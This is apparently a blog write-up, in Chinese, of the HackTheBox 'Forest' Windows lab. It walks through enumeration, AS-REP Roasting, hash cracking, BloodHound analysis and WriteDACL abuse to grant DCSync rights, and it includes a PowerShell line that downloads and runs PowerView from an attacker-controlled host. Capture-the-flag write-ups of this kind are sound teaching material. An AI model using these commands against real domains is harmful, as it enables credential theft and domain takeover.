Forest - HackTheBox - Aurey7's Blog

年轻人的第一台Windows靶机

没打过Windows靶机，这台用来熟悉一下套路，收集了国内外很多Writeup总结下大伙的技术和思路

信息收集

端口扫描

区域传输

失败

SMB

没有匿名共享目录

RPC

RPC远程过程调用枚举用户，拿到了用户和用户组信息

查找对应的管理员组及管理员信息

enum4linux

1	`enum4linux -v 10.10.10.161`

Get User Flag

AS-REP Roasting

拿到了用户名，这里又暴露了kerberos端口。直接尝试一下AS-REP Roasting攻击。

1	`for user in $(cat user.txt);do python3 examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} \| grep -v impacket;done`

拿到了svc-alfresco用户的hash，这里使用john进行破解，得到密码s3rvice

WinRM

拥有账号密码可以直接利用evil-winrm连接

Get Root Flag

BloodHound

自行搭建好BloodHound
使用bloodhound-python进行信息收集
将收集到的信息（json文件）上传到BloodHound进行分析

1	`bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -c all -ns 10.10.10.161`

Shortest Path from Owned Principals

可以发现svc-alfresco在Account Operators组中，该组的成员可以创建和修改大多数类型的帐户，包括用户、本地组和全局组的帐户。

参考：https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#account-operators

Find Shortest Paths to Domain Admins

分析到达Domain Admins的最短路径

Account Operators组对Exchange Windows Permissions组拥有Generic ALL权限

攻击思路

添加一个用户到Exchange Windows Permissions组中
利用Exchange Windows Permissions组的WriteDACL授予用户DCSync权限
通过DCSync进行域同步并窃取用户哈希

添加用户至Exchange Windows Permissions 组

借助 PowerSploit 中的 powerview.ps1 来滥用WriteDacl权限

1	`iex(New-Object Net.webclient).downloadstring('http://10.10.16.76:8000/PowerView.ps1')`

创建凭证对象并授予 DCSync 权限

1
2
3

$pass = convertto-securestring 'passwd123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\aurey', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aurey -Rights DCSync